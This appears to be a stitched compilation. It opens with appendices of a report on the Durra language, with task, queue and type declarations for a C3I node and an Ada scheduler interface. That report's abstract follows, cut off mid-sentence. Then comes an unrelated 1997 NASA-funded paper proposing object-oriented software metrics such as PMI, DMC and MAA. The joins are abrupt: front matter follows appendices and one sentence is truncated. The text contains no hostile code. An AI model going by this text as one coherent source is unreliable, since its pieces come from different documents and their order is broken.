in1 : in workstation_if_message;
out1, out2 : out workstation_if_message;
end broadcast;
muxp: task merge -- message multiplexor
ports
out1 : out comm_if_message;
in1, in2 : in comm_if_message;
attribute
mode = fifo;
end merge;
bc : task broadcast -- command broadcast
ports
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
mg : task merge -- response multiplexor
ports
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
queues
-- system command propagation
q_c1 : sm.SM_Out >> bc.in1;
q_c2 : bc.out1 >> com.SM_Commands;
q_c3 : bc.out2 >> amh.SM_Commands;
-- subsystem response propagation
q_r1 : com.SM_Responses >> mg.in1;
q_r2 : amh.SM_Responses >> mg.in2;
q_r3 : mg.out1 >> sm.SM_In;
-- inbound message propagation
q_i1 : com.Inbound >> amh.COMM_Inbound;
q_i2 : amh.WS_Inbound >> dmxp.in1;
q_i3 : dmxp.out1 >> w1p.Inbound;
q_i4 : dmxp.out2 >> w2p.Inbound;
-- outbound message propagation
q_o1 : w1p.Outbound >> muxp.in1;
q_o2 : w2p.Outbound >> muxp.in2;
q_o3 : muxp.out1 >> amh.WS_Outbound;
q_o4 : amh.COMM_Outbound >> com.Outbound;
end configuration;
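The auxiliary tasks in the configuration above come in two kinds: `broadcast` copies each input message to every output queue, and `merge` (with `mode = fifo`) forwards messages from several input queues to a single output in arrival order. A minimal Python sketch of these two behaviors (ours, not the Durra runtime's implementation):

```python
from collections import deque

def broadcast(in_q, out_qs):
    """Copy every message on in_q to each queue in out_qs."""
    while in_q:
        msg = in_q.popleft()
        for q in out_qs:
            q.append(msg)

def merge_fifo(in_qs, out_q, arrivals):
    """Forward messages to out_q in arrival order.

    'arrivals' stands in for time order: it lists which input queue
    produced each successive message.
    """
    for i in arrivals:
        out_q.append(in_qs[i].popleft())

# Broadcast: both subsystems see every system command.
in_q = deque([b"cmd1", b"cmd2"])
out1, out2 = deque(), deque()
broadcast(in_q, [out1, out2])
print(list(out1) == list(out2))  # True

# Merge: responses are interleaved in arrival order.
a, b, merged = deque([b"resp_a"]), deque([b"resp_b"]), deque()
merge_fifo([a, b], merged, [1, 0])
print(list(merged))  # [b'resp_b', b'resp_a']
```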
Appendix B: Application Message Handler Description
B.1. Subsystem Description
task AMHS
-- Automated Message Handling Subsystem
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
COMM_Inbound : in comm_if_message;
COMM_Outbound : out comm_if_message;
WS_Inbound : out workstation_if_message;
WS_Outbound : in comm_if_message;
structure
process
ac : task AMHS_control;
ai : task AMHS_inbound;
ao : task AMHS_outbound;
pb : task broadcast
port
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
pm : task merge
port
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
bind
SM_Commands = ac.SM_In;
SM_Responses = ac.SM_Out;
COMM_Inbound = ai.COMM_Inbound;
COMM_Outbound = ao.COMM_Outbound;
WS_Inbound = ai.WS_Inbound;
WS_Outbound = ao.WS_Outbound;
queue
q1 : ac.Cmd_Out >> pb.in1;
q2 : pb.out1 >> ai.Cmd_In;
q3 : pb.out2 >> ao.Cmd_In;
q4 : ai.Resp_Out >> pm.in1;
q5 : ao.Resp_Out >> pm.in2;
q6 : pm.out1 >> ac.Resp_In;
end AMHS;
B.2. Component Task Descriptions
B.2.1. Control Task
```plaintext
task amhs_control
ports
SM_In : in system_command;
SM_Out : out subsystem_response;
Cmd_Out : out system_command;
Resp_In : in subsystem_response;
attributes
implementation = "amh_control";
x10window = "80x12+0+0";
x11window = "-geometry 80x12+0+0";
processor = sun;
end amhs_control;
```
B.2.2. Inbound Message Task
```plaintext
task amhs_inbound
ports
Cmd_In : in system_command;
Resp_Out : out subsystem_response;
COMM_Inbound : in comm_if_message;
WS_Inbound : out workstation_if_message;
attributes
implementation = "amh_inbound";
x10window = "80x12+0+190";
x11window = "-geometry 80x12+0+190";
processor = sun;
end amhs_inbound;
```
B.2.3. Outbound Message Task
```plaintext
task amhs_outbound
ports
Cmd_In : in system_command;
Resp_Out : out subsystem_response;
COMM_Outbound : out comm_if_message;
WS_Outbound : in comm_if_message;
attributes
implementation = "amh_outbound";
x10window = "80x12+0+380";
x11window = "-geometry 80x12+0+380";
processor = sun;
end amhs_outbound;
```
Appendix C: Communications
C.1. Subsystem Description
task comm
-- red communications processing
ports
SM_Commands : in system_command;
SM_Responses : out subsystem_response;
Inbound : out comm_if_message;
Outbound : in comm_if_message;
structure
process
cc : task comm_control;
ci : task comm_inbound;
co : task comm_outbound;
pb : task broadcast
port
in1 : in system_command;
out1, out2 : out system_command;
end broadcast;
pm : task merge
port
in1, in2 : in subsystem_response;
out1 : out subsystem_response;
attribute
mode = fifo;
end merge;
bind
SM_Commands = cc.SM_In;
SM_Responses = cc.SM_Out;
Inbound = ci.Inbound;
Outbound = co.Outbound;
queue
q1 : cc.Cmd_Out >> pb.in1;
q2 : pb.out1 >> ci.Cmd_In;
q3 : pb.out2 >> co.Cmd_In;
q4 : ci.Resp_Out >> pm.in1;
q5 : co.Resp_Out >> pm.in2;
q6 : pm.out1 >> cc.Resp_In;
q7 : co.Echo_Out >> ci.Echo_In;
end comm;
C.2. Component Task Descriptions
C.2.1. Control Task
```plaintext
task comm_control
ports
SM_In : in system_command;
SM_Out : out subsystem_response;
Cmd_Out : out system_command;
Resp_In : in subsystem_response;
attributes
implementation = "rcom_control";
x10window = "=80x12+510+0";
x11window = "-geometry 80x12+510+0";
processor = sun;
end comm_control;
```
C.2.2. Inbound Message Task
```plaintext
task comm_inbound
ports
Cmd_In : in system_command;
Resp_Out : out subsystem_response;
Inbound : out comm_if_message;
Echo_In : in comm_if_message;
attributes
implementation = "rcom_inbound";
x10window = "=80x12+510+190";
x11window = "-geometry 80x12+510+190";
processor = sun;
end comm_inbound;
```
C.2.3. Outbound Message Task
```plaintext
task comm_outbound
ports
Cmd_In : in system_command;
Resp_Out : out subsystem_response;
Outbound : in comm_if_message;
Echo_Out : out comm_if_message;
attributes
implementation = "rcom_outbound";
x10window = "=80x12+510+380";
x11window = "-geometry 80x12+510+380";
processor = sun;
end comm_outbound;
```
task system_manager
ports
SM_In : in subsystem_response;
SM_Out : out system_command;
attributes
implementation = "system_manager";
x10window = "=80x12+200+570";
x11window = "-geometry 80x12+200+570";
processor = sun;
end system_manager;
Appendix E: Workstation Description
To preserve proprietary information, we do not show the various tasks constituting the user's workstation subsystem. For the purposes of our demonstration, their functions were carried out by the workstation manager task.
E.1. Subsystem Description
```plaintext
task wkstn
ports
Inbound : in workstation_if_message;
Outbound : out comm_if_message;
structure
process
wm: task wkstn_manager;
bind
Inbound = wm.Inbound;
Outbound = wm.Outbound;
end wkstn;
```
E.2. Component Task Descriptions
E.2.1. Manager Task
```plaintext
task wkstn_manager
ports
Inbound : in workstation_if_message;
Outbound : out comm_if_message;
attributes
processor = sun;
x10window = "=80x12+0+740";
x11window = "-geometry 80x12+0+740";
implementation = "usi_sim";
end wkstn_manager;
```
Appendix F: Type Declarations
```
type byte is size 8;
type comm_if_message is array of byte;
type string is array of byte;
type subsystem_response is array of byte;
type system_command is array of byte;
type workstation_if_message is array of byte;
```
Appendix G: Scheduler Interface for Ada Task Implementations
with system; use system;
package Interface is
-- | Durra Scheduler Interface (Low Level)
-- |
-- | This package provides the interface to the Durra scheduler for tasks
-- | written in Ada;
-- |
-- | The init_* variables are the parameters passed by the server when a
-- | task is initialized. The server in turn gets them from the scheduler.
-- REVISION HISTORY
-- 01/03/88 mrb Package spec created.
-- 06/13/88 dd Test_Port expanded to separate routines for
-- input and output ports.
-- 07/5/88 dd Constant environment names changed to function calls.
function User_Task_Name return STRING;
function Scheduler_Host return STRING;
function Scheduler_Port return STRING;
function User_Process_ID return STRING;
function Scheduler_Debug_Level return STRING;
function User_Source_Paramet return STRING;
procedure Finish;
procedure Get_Port (Port_ID : in POSITIVE;
Data : in System.Address;
Data_Size : out NATURAL;
Type_ID : out NATURAL);
procedure Get_PortId (Port_Name : in STRING;
Port_ID : out POSITIVE;
Queue_Bound : out POSITIVE;
Data_Size : out NATURAL);
procedure Get_TypeId (Type_Name : in STRING;
Type_ID : out NATURAL;
Type_Size : out NATURAL);
procedure Init;
procedure Send_Port (Port_ID : in POSITIVE;
Data : in System.Address;
Data_Size : in NATURAL;
Type_ID : in NATURAL);
procedure Test_Input_Port (Port_ID : in POSITIVE;
Type_of_Next_Input : out NATURAL;
Size_of_Next_Input : out NATURAL;
Inputs_in_Queue : out NATURAL);
procedure Test_Output_Port (Port_ID : in POSITIVE;
Spaces_Available : out NATURAL);
end Interface;
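To make the shape of this interface concrete, the following is a hypothetical Python rendering (the real interface is the Ada package specification above) of how a task body uses the scheduler: call `Init`, look up port identifiers by name, loop moving data between ports, then call `Finish`. The `Scheduler` class here is a toy stand-in, not the Durra runtime.

```python
class Scheduler:
    """Toy stand-in for the Durra runtime scheduler."""
    def __init__(self):
        self.port_ids = {"Inbound": 1, "Outbound": 2}
        self.queues = {1: [b"message"], 2: []}
    def init(self):                     # Init
        pass
    def get_portid(self, name):         # Get_PortId
        return self.port_ids[name]
    def test_input_port(self, pid):     # Test_Input_Port
        return len(self.queues[pid])    # inputs currently in queue
    def get_port(self, pid):            # Get_Port
        return self.queues[pid].pop(0)
    def send_port(self, pid, data):     # Send_Port
        self.queues[pid].append(data)
    def finish(self):                   # Finish
        pass

# A pass-through task body: forward everything from Inbound to Outbound.
sched = Scheduler()
sched.init()
inp = sched.get_portid("Inbound")
outp = sched.get_portid("Outbound")
while sched.test_input_port(inp):
    sched.send_port(outp, sched.get_port(inp))
sched.finish()
print(sched.queues[outp])  # [b'message']
```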
Abstract: Durra is a language designed to support the construction of distributed applications using concurrent, coarse-grain tasks running on networks of heterogeneous processors. An application written in Durra describes the tasks to be instantiated and executed as concurrent processes, the types of data to be exchanged by the processes, and the intermediate queues required to store the data as they move from producer to consumer processes.
This report describes an experiment in implementing a command, control, communications, and intelligence (C³I) node using reusable components. The experiment involves writing task descriptions and type declarations for a subset of the TRW testbed, a collection of C³I software modules developed by TRW Defense Systems Group. The experiment illustrates the development of a typical Durra application. This is a three-step process: first, a collection of tasks (programs) is
This report illustrates the methodology for building complex, distributed systems supported by Durra. It does not, however, illustrate all the features of the language; in particular, it does not illustrate those features that support dynamic, but planned, reconfiguration of a running application, or those features supporting unplanned dynamic reconfigurations as a means to support fault tolerance. These considerations are the subject of current design and development and will be the subject of a future report.
An Improved Suite of Object Oriented Software Measures
By Ralph D. Neal, Roland Weistroffer, and Richard J. Coppins
June 27, 1997
This technical report is a product of the National Aeronautics and Space Administration (NASA) Software Program, an agency-wide program to promote continual improvement of software engineering within NASA. The goals and strategies of this program are documented in the NASA software strategic plan, July 13, 1995.
Additional information is available from the NASA Software IV&V Facility on the World Wide Web site http://www.ivv.nasa.gov/
This research was funded under cooperative Agreement #NCC 2-979 at the NASA/WVU Software Research Laboratory.
An Improved Suite of Object Oriented Software Measures
Ralph D. Neal
West Virginia University
H. Roland Weistroffer
Virginia Commonwealth University
School of Business, Richmond, VA 23284-4000
Richard J. Coppins
Virginia Commonwealth University
School of Business, Richmond, VA 23284-4000
Abstract
In the pursuit of ever increasing productivity, the need to be able to measure specific aspects of software is generally agreed upon. As object oriented programming languages are becoming more and more widely used, metrics specifically designed for object oriented software are required. In recent years there has been an explosion of new, object oriented software metrics proposed in the literature. Unfortunately, many or most of these proposed metrics have not been validated to measure what they claim to measure. In fact, an analysis of many of these metrics shows that they do not satisfy basic properties of measurement theory, and thus their application has to be suspect. In this paper ten improved metrics are proposed and are validated using measurement theory.
Introduction
In the early days of computer applications, software development was best described as art, rather than science. The absence of design guidelines often resulted in spaghetti code that was unintelligible to those charged with maintaining the software. In the pursuit of greater productivity, software development eventually became more structured and evolved into the field of software engineering. Part of the engineering concept is that the characteristics of the product must be controllable, and DeMarco [4] reminds us that what is to be controlled must be measured.
Measurement is the process whereby numbers or symbols are assigned to dimensions of entities in such a manner as to describe the dimension in a meaningful way. For example, inches or centimeters are meaningful in measuring the dimension height of the entity person. They are not meaningful however, to measure the age of a person. A requirement of meaningful measurement is that intuitive and empirical assessments of the entities and dimensions are preserved. For
example, when measuring the height of two people, the taller person should be assigned the larger value. A further requirement for meaningfulness is some model that defines how measurements are to be taken. For example, should posture be taken into consideration when measuring human height? Should shoes be allowed? Should the height be measured to the top of the head or the top of the hair? The model is necessary because a reasonable consensus by the measurers is needed [6].
Software development continues to evolve. In recent years, object oriented programming languages have become widely accepted, and to some extent the concepts of structured programming are being replaced or augmented by object oriented concepts. Object oriented software is organized as a collection of objects, where objects are entities that combine both data structure and behavior. By contrast, data structures and behavior are only loosely connected in traditional, structured programming (see for example [13]). Though there is no general agreement among authors on all the characteristics and on the exact terminology that define the object oriented paradigm, object oriented models can be summarized by the three properties of encapsulation, abstraction, and polymorphism [7]. Encapsulation, sometimes also called information hiding, refers to the concept of combining data and functions into objects, thus hiding the specifics from the user, who is given a more conceptual view of the objects, independent of implementation details. Abstraction refers to the grouping of objects with similar properties into classes. Common properties are described at the class level. A class may possess subclasses that describe further properties. Multiple levels of subclasses are allowed. Polymorphism is the ability of an object to interpret a message according to the properties of its class. The same message may result in different actions, depending on the class or subclass that contains the object. Subclasses inherit all the properties of their super classes, but may have additional properties not defined in the super class.
Because object oriented software has distinctly different characteristics from traditional, structured programs, different metrics are needed for object oriented software. Few such metrics were available until just a few years ago, but recently there has been an avalanche of newly proposed metrics [3] [9] [10]. Unfortunately, few of these metrics have been validated beyond some regression analysis of observed behavior.
Validation of a software metric is showing that the metric is a proper numerical characterization of the claimed dimension [1] [5]. Zuse [16] did an extensive validation and classification of conventional software metrics, using measurement theory. Neal [11] did a similar study for object oriented metrics and found that many of the proposed metrics cannot be considered valid measures of the dimension they claim to measure. The current paper proposes a suite of ten new metrics which have been validated using measurement theory, and which may replace some of those earlier published metrics that were not found to be valid measures.
The rest of this paper is organized as follows: In the next section, a model based on measurement theory and modified from Zuse's model [16] [17] [19] is described, for validating object oriented software metrics. Following that, ten new metrics are introduced and classified, based on this model.
**The Validation Model**
There are two fundamental considerations in measurement theory: representation and uniqueness. The representation problem is to find sufficient conditions for the existence of a mapping from an observed system to a given mathematical system. The sufficient conditions, referred to as representation axioms, specify conditions under which measurement can be performed. The measurement is then stated as a representation theorem. Uniqueness theorems define the properties and valid processes of different measurement systems and tell us what type of scale results from the measurement system. The scale used dictates the meaningfulness of measures or metrics [8] [12] [14].
To explain the representation problem, suppose we observe that Tom is the tallest of a group of three people, Dick is the shortest of the three, and Harry is taller than Dick and shorter than Tom. A taller than relationship among the three people has been empirically established [5]. Any measurement taken of the height of these three people must result in numbers or symbols that preserve this relationship. If it is further observed that Tom is much taller than Dick, then this relationship must also be preserved by any measurement taken. That is, the numbers or symbols used to represent the heights of Tom and Dick must convey to the observer the fact that Tom is indeed much taller than Dick. If it is further observed that Dick towers over Tom when seated on Harry’s shoulders, then another relationship has been established which must also be preserved by any measurement taken. This relationship might be represented in the real number system by .7 Dick + .8 Harry > Tom. Any numbers that resulted from measuring the height of Tom, Dick, and Harry would have to satisfy the observation represented by our formula.
To illustrate the uniqueness problem, let us consider two statements: 1) This rock weighs twice as much as that rock; 2) This rock is twice as hot as that rock. The first statement seems to make sense but the second statement does not. The ratio of weights is the same regardless of the unit of measurement while the ratio of temperature depends on the unit of measurement. Weight is a ratio scale, therefore, regardless of whether the weights of the rocks are measured in grams or ounces the ratio of the two is a constant. Fahrenheit and Celsius temperatures are interval scales, i.e., they exhibit uniform distance between integer points but have no natural origin. Because Fahrenheit and Celsius are interval scales, the ratio of the temperatures of the rocks measured on the Fahrenheit scale is different from the ratio when the temperatures are measured on the Celsius scale. Statements, such as those above, are meaningful only if they are unique, i.e. if their truth is maintained even when the scale involved is replaced by another admissible scale.
Metrics may be valid with respect to ordinal scales only, or they may be valid with respect to interval or ratio scales. The ordinal scale allows comparisons of the type “entity A is greater than entity B” or “entity A is at least as great as entity B.” Rank order statistics and non-parametric statistics may be used with entities measured on an ordinal scale. The median is the most meaningful measure of centrality on an ordinal scale.
The interval scale allows the differences between measurements to be meaningful. Statements such as “the difference between A and B is greater than the difference between B and C” can be made about entities measured on an interval scale. When groups of entities are measured on the interval scale, parametric statistics as well as all statistics that apply to ordinal scales can be used, provided that the necessary probability distribution assumptions are being met. The arithmetic mean is the most powerful and meaningful measure of centrality.
Use of the *ratio scale* implies that the ratios of measurements are meaningful, as for example in measuring the density or volume of something. Statements such as “A is twice as complex as B” can be made about entities measured on the ratio scale. When groups of entities are measured on the ratio scale, percentage calculations as well as all statistics that apply to the interval scale can be used. The arithmetic mean is the most powerful and meaningful measure of centrality.
In order for a metric to be valid on an ordinal scale, it must be representative of the dimension under consideration (e.g. complexity or size) and it must satisfy the axioms of the weak order, i.e. completeness, transitivity, and reflexivity. In order for a metric to be valid on an interval or ratio scale, it must be valid on an ordinal scale and satisfy additional axioms. There are certain desirable properties that contribute toward the degree that a metric may be considered representative [15]. For example, a metric should satisfy intuition, i.e. it should make sense based upon the professional experience of the measurer. Entities that appear better in the dimension being measured (based on the observer’s experience) should score higher on the metric being used. Entities that appear similar should score roughly the same. Consistency is another important feature. The measurement must be such that very nearly the same score is achieved regardless of the measurer, and the order in which the entities appear, in relation to each other, must be consistent from measurement to measurement. Further, in order for the metric to be useful, there must be sufficient variation in the measurement of different entities.
Zuse [16] [17] evaluated metrics of software code using flowgraphs to describe the possible structures being measured. Zuse defined modifications to the flowgraphs to describe the properties of the metric. The value of each metric increased, decreased, or stayed the same for each modification. The relation between the value of the metric taken before the modification to the flowgraph and the value of the same metric taken after the modification to the flowgraph is the *partial property* of the modification for this metric. Before a metric can be considered valid with respect to a specific scale, sufficient *atomic modifications* must be defined to describe the changes that can affect the metric, the partial properties of the metric must be established, and these partial properties must satisfy common intuition. An atomic modification is defined as the smallest change that can be made to an entity being measured, which will change the result of the measurement. There may be multiple possible atomic modifications for a metric.
Determining what the relevant atomic modifications are for each metric is itself a task based on intuition. Validation here is not a mathematical proof, but rather comparable to validation of scientific theories. Once sufficient evidence is found to support a theory, and as long as no contrary evidence is found, a theory is accepted as valid. The possibility of later refutation is always a reality.
If no atomic modification is found to contradict the premise of the measure, the measure may be accepted as valid on the ordinal scale. In order to be accepted valid on the ratio scale, the measure must preserve size relationships under concatenation of entities, i.e. the concatenated entities must have a measure equal to the sum (or the union, depending on the type of entities) of the measures of the original entities [18].
**Newly Proposed Object-Oriented Software Metrics**
1. **Potential Methods Inherited (PMI)**
PMI is defined as the maximum count of methods that could potentially be invoked by a class. PMI is offered as an improvement to the Depth of the Inheritance Tree (DIT) metric of Chidamber and Kemerer [3], and the Number of Methods Inherited by a Subclass (NMI) metric of Lorenz and Kidd [10]. Both are proposed as measures of complexity. DIT is defined as zero for a class that has no super class, i.e. the root node of the inheritance tree, one for each of the root node's immediate subclasses, two for the subclasses of these subclasses, etc. NMI is defined as the number of methods inherited by a class, i.e. the count of methods in all super classes. PMI differs from NMI in that PMI also counts the methods that are defined in the class itself, i.e. are not inherited.
As an example, assume in Figure 1 below that class A has five methods, class B has four methods, and class C has six methods. The NMI for classes B and C would be 5, the PMI for class B would be 9, and the PMI for class C would be 11. NMI for the combined class B+C in Figure 2 would still be 5. The PMI for the combined class B+C would be 15.
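The NMI and PMI computations above can be sketched as a short walk up the inheritance chain; the class names and method counts below are the hypothetical ones from the Figure 1 example:

```python
# Hypothetical class tree from the example: each class maps to
# (parent, number of locally defined methods); the root's parent is None.
tree = {"A": (None, 5), "B": ("A", 4), "C": ("A", 6)}

def nmi(cls):
    """Number of Methods Inherited: count of methods in all superclasses."""
    parent = tree[cls][0]
    return 0 if parent is None else tree[parent][1] + nmi(parent)

def pmi(cls):
    """Potential Methods Inherited: inherited methods plus local methods."""
    return nmi(cls) + tree[cls][1]

print(nmi("B"), pmi("B"), pmi("C"))  # 5 9 11, as in the worked example

# Combining siblings B and C into one class with 10 local methods:
tree["B+C"] = ("A", 10)
print(nmi("B+C"), pmi("B+C"))  # NMI stays 5, PMI becomes 15
```

Note how the sketch reproduces the weakness of NMI discussed below: the merged class B+C keeps NMI = 5 even though it now holds many more methods, while PMI rises to 15.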
To see problems with the validity of the DIT metric, consider the case where a class with subclasses is combined with a sibling class (Figures 1 and 2 below). No change in DIT takes place indicating equal complexity, even though the number of methods inherited has increased. Alternatively, consider the case where a class is combined with its super class, thereby reducing the DIT for all of its subclasses (Figures 3 and 4 below). The new DIT would indicate that complexity has been reduced, even though no change in the number of methods has taken place.
To see problems with the validity of the NMI metric, consider the case where two sibling classes are combined (Figures 1 and 2 below). The NMI for the new, combined class is the same as the NMI was for the sibling classes before the combination, indicating equal complexity, even though the new class may contain many more methods. This problem does not occur with the proposed PMI metric, as it counts the local methods as well.
To further validate PMI as a measure of complexity, consider Figure 1 and the atomic modification of adding or deleting a class at some lower level of the inheritance tree. If, for example, a new class is added as a subclass of D, E, F, or G, it is clear that the PMI of the added class is higher than that of the parent class. This supports our intuitive assumption that complexity increases (decreases) as methods are added to (deleted from) an existing inheritance tree or hierarchy chart. Irrespective of where the new class is added (deleted), the PMI of the classes affected, i.e. those classes that are at some lower level of the path on which the added or deleted class lies, will increase (decrease).
Consider the atomic modification of combining two classes that are not children and not siblings of each other, e.g. combining B and G in Figure 1 to get Figure 5. The PMI for class F remains unchanged. The PMI of classes D and E increases, as does the PMI of the combined class.
Finally, consider the atomic modification of combining a parent with its child class, as shown for example in Figures 3 and 4. The PMI of class F remains unchanged. The PMI of classes C and D increases.
As stated earlier, a measure can be used as an ordinal scale if the partial properties of the atomic modifications defined for that measure are acceptable and the axioms of the weak order hold. Thus, if the above examples pass the test of common sense and intuition, PMI can be accepted on the ordinal scale as a complexity measure of classes.
In order to validate PMI on the ratio scale, we need to show that PMI is additive under the concatenation patterns of object-oriented classes. Consider Figure 1 as a structure to which we wish to add Figure 6. Assume XYZ is inserted between A, B and C such that X is a subclass of A, B is a subclass of Y, and C is a subclass of Z. Let -old signify measurements taken before the merge, and let -new signify measurements taken after the merge. Since all methods in all classes along the path to the root node are counted, it is always the case that
\[
\begin{align*}
PMI_{D\text{-}new} &= PMI_{D\text{-}old} + PMI_{Y\text{-}old} \\
PMI_{E\text{-}new} &= PMI_{E\text{-}old} + PMI_{Y\text{-}old} \\
PMI_{F\text{-}new} &= PMI_{F\text{-}old} + PMI_{Z\text{-}old} \\
\text{and} \quad PMI_{G\text{-}new} &= PMI_{G\text{-}old} + PMI_{Z\text{-}old}.
\end{align*}
\]
In general, whenever concatenation takes place, the PMI of classes affected will increase by the number of methods in the classes that are being inserted within the path to the root node. Thus the PMI metric meets the measurement theory properties of the ratio scale.
2. **Proportion of Methods Inherited by a Subclass (PMIS)**
PMIS is offered as an improvement to the NMI metric of Lorenz and Kidd [10]. PMIS is a measure of the strength of subclassing by inheritance. PMIS ranges along the closed interval [0,1], and is calculated by dividing the NMI of the subclass by the PMI of the subclass, i.e. the total number of methods in the path including the subclass (see previous section). Thus,
\[
PMIS = \frac{\text{NMI}}{\text{PMI}}.
\]
The partial properties of the metric are described by the atomic modifications of adding (subtracting) a method to the subclass being measured, and adding (subtracting) a method to a class along the path to the subclass being measured. As methods are added to (removed from) the subclass being measured, PMIS decreases (increases), since only the divisor PMI grows. As methods are added to (removed from) a super class of the subclass being measured, PMIS increases (decreases), since NMI and PMI grow by the same amount. If we accept that PMIS measures subclassing by inheritance, then we can accept PMIS as an ordinal scale.
The measure PMIS can be parsed into two separate components. The dividend is the number of methods inherited by the subclass, and the divisor is the total number of methods available to the subclass. Both the dividend and the divisor are counts, which put them on the absolute scale. PMIS is the proportion of methods available to a subclass which are available through inheritance. Proportions are ratio scales [12]. Therefore, if we accept PMIS as a measure of specialization, PMIS can be accepted as a ratio scale.
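As a sketch of this definition, using the hypothetical method counts from the earlier PMI example, PMIS and its partial properties can be checked directly:

```python
def pmis(inherited, local):
    """PMIS = NMI / PMI, with PMI = inherited + locally defined methods."""
    return inherited / (inherited + local)

# Class B from the earlier example: 5 inherited methods, 4 local ones.
print(pmis(5, 4))  # 5/9

# Partial properties: a new local method lowers PMIS,
# a new inherited method raises it.
assert pmis(5, 5) < pmis(5, 4) < pmis(6, 4)
```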
3. **Density of Methodological Cohesiveness (DMC)**
DMC is proposed as an alternative to the *Lack of Cohesion in Methods (LCOM)* metric of Chidamber and Kemerer [3]. LCOM is calculated by looking at all possible pairs of methods within a class, and by counting those pairs with some common instance variables, and those pairs having zero common instance variables. LCOM is defined as the number of pairs with zero common instance variables, minus the number of pairs with some common instance variables, as long as this difference is non-negative, otherwise LCOM is taken to be zero. One problem with the LCOM metric is that a value of zero can mean anything between equal numbers of pairs with and without common instance variables, to all pairs having some common instance variables. The metric does not discriminate in these cases, and thus may be of little value.
DMC is defined as the number of pairs of methods that have some common instance variables within an object class, divided by the total number of pairs of methods in the class. DMC ranges along a continuum in the closed interval [0,1]. If \( S = \) the count of pairs of methods with some similarities, and if \( N = \) the total number of methods, then the total number of pairs of methods = \((N*(N-1))/2\), and \( \text{DMC} = S / ((N*(N-1))/2) = 2S/(N*(N-1)). \)
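A minimal sketch of this computation, assuming each method is represented by the set of instance variables it uses:

```python
from itertools import combinations

def dmc(methods):
    """DMC: fraction of method pairs sharing at least one instance
    variable. `methods` maps a method name to the set of instance
    variables it uses (an assumed input shape)."""
    pairs = list(combinations(methods.values(), 2))
    similar = sum(1 for a, b in pairs if a & b)  # S: pairs with overlap
    return similar / len(pairs)                  # 2S / (N*(N-1))

# Three methods: only m1 and m2 share an instance variable,
# so S = 1 over N*(N-1)/2 = 3 pairs.
print(dmc({"m1": {"x", "y"}, "m2": {"y"}, "m3": {"z"}}))  # 1/3
```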
In order to describe the partial properties of DMC we apply the atomic modification of adding or deleting a method to the measured class. If the added method uses instance variables already being used in the class, DMC will increase in proportion to the number of methods already using the instance variables. If added methods use instance variables unique in the class, DMC will decrease in proportion to the number of methods added. This seems congruent to most users' understanding of inter-relatedness and thus their understanding of cohesiveness of methods. A measure can be used as an ordinal scale if the user accepts the partial properties of the atomic modifications defined for that measure and the axioms of the weak order hold. The axioms of the weak order hold and DMC can be accepted as an ordinal scale.
The measure DMC is the proportion of two counts, and proportions are ratio scales [12]. Therefore, if we can accept that the ratio of pairs of methods which have some common instance variables defines a measure of cohesiveness of methods within a class, DMC may be assigned to the ratio scale. Counting common instance variables within the method pairs would likely be an even better metric, but it would be harder and more costly to determine.
4. **Messages and Arguments (MAA)**
MAA undertakes to quantify the communication complexity of a method and is offered as an improvement to the *Number of Message-sends (NMS)* metric of Lorenz and Kidd [10]. Some messages require no arguments. These messages nevertheless add complexity to the method and must be accounted for in any metric which proposes to measure method complexity. Each argument required by a message adds additional complexity to the method and must likewise be accounted for in any metric which proposes to measure method complexity. MAA is a count of the number of message-sends in a method plus a count of the number of arguments in the messages. MAA ranges from 0 to $N$ where $N$ is a positive integer.
Let $|m|$ be the number of message-sends in a method, and let $|a_i|$ be the number of arguments in the $i^{th}$ message-send. Then
$$\text{MAA} = \sum |a_i| + |m|.$$
The metric is designed to measure a method. Methods are designed to fulfill certain purposes and certain functions must be called in order to meet this design. These message-sends are not likely to be moved from one method to another. The partial property of interest is the addition (deletion) of message-sends or function calls to a method. As function calls are added (deleted), the value of MAA increases (decreases). The user would agree that a method grows more (less) complex as function calls are added to (deleted from) the method. The user would also agree that function calls with arguments add more complexity than function calls without arguments and that the more arguments a function call has, the more complexity it adds. If that is the case, MAA can be assigned to the ordinal scale.
The formation of a class is accomplished through the concatenation of methods. Concatenation can be either sequential or alternative. The alternative form of concatenation would involve the inclusion of an “IF” statement in the class to determine whether a method would be instantiated at run time. The sequential form is used whenever all methods are to be instantiated without exception. Let $\{M\}$ be the set of methods concatenated to form a class and let $M_i$ be the $i^{th}$ method. Further, let $\text{MAA}_i$ be the MAA of method $M_i$ and let $\text{MAA}_{M}$ be the MAA of the set $\{M\}$. Since there are no message-sends included in the “IF” statements added in the alternate form of concatenation and because message-sends are not merged in the sequential form of concatenation, then, $\text{MAA}_M = \sum \text{MAA}_i$. This being the case, it follows that if MAA is a valid measure of method complexity on an ordinal scale, then MAA is valid on a ratio scale.
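The MAA computation and its additivity under sequential concatenation can be sketched as follows, assuming a method is represented simply by the list of argument counts of its message-sends:

```python
def maa(arg_counts):
    """MAA = |m| + sum of |a_i|: the number of message-sends plus the
    total argument count, given one argument count per send (an
    assumed representation of a method body)."""
    return len(arg_counts) + sum(arg_counts)

# A method with three message-sends taking 0, 1, and 2 arguments:
print(maa([0, 1, 2]))  # 3 sends + 3 arguments = 6

# Concatenating methods into a class is additive, as argued above:
assert maa([0, 1] + [2]) == maa([0, 1]) + maa([2])
```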
5. **Density of Abstract Classes (DAC)**
DAC is offered as a complement to the *Number of Abstract Classes (NAC)* metric of Lorenz and Kidd [10]. Abstract classes facilitate the reuse of methods and state data. Methods in abstract classes are not instantiated but rather are passed on to subclasses through inheritance. DAC is proposed as a measure of reuse through inheritance. DAC is the proportion of abstract classes in a project and ranges along the closed interval $[0,1]$.
Consider the hierarchy chart in Figure 1, where the nodes represent classes and subclasses, and the arcs represent inheritance. Assume that the main purpose of class C is to define a common interface for classes F and G. Then class C cannot be instantiated and is known as an abstract class. Assuming that class C is the only abstract class in this program, the DAC of this program is 1/7.
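A minimal sketch of the DAC computation for this example:

```python
def dac(all_classes, abstract_classes):
    """DAC: proportion of abstract classes among all classes."""
    return len(abstract_classes) / len(all_classes)

# Figure 1: seven classes, with C assumed to be the only abstract one.
print(dac({"A", "B", "C", "D", "E", "F", "G"}, {"C"}))  # 1/7
```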
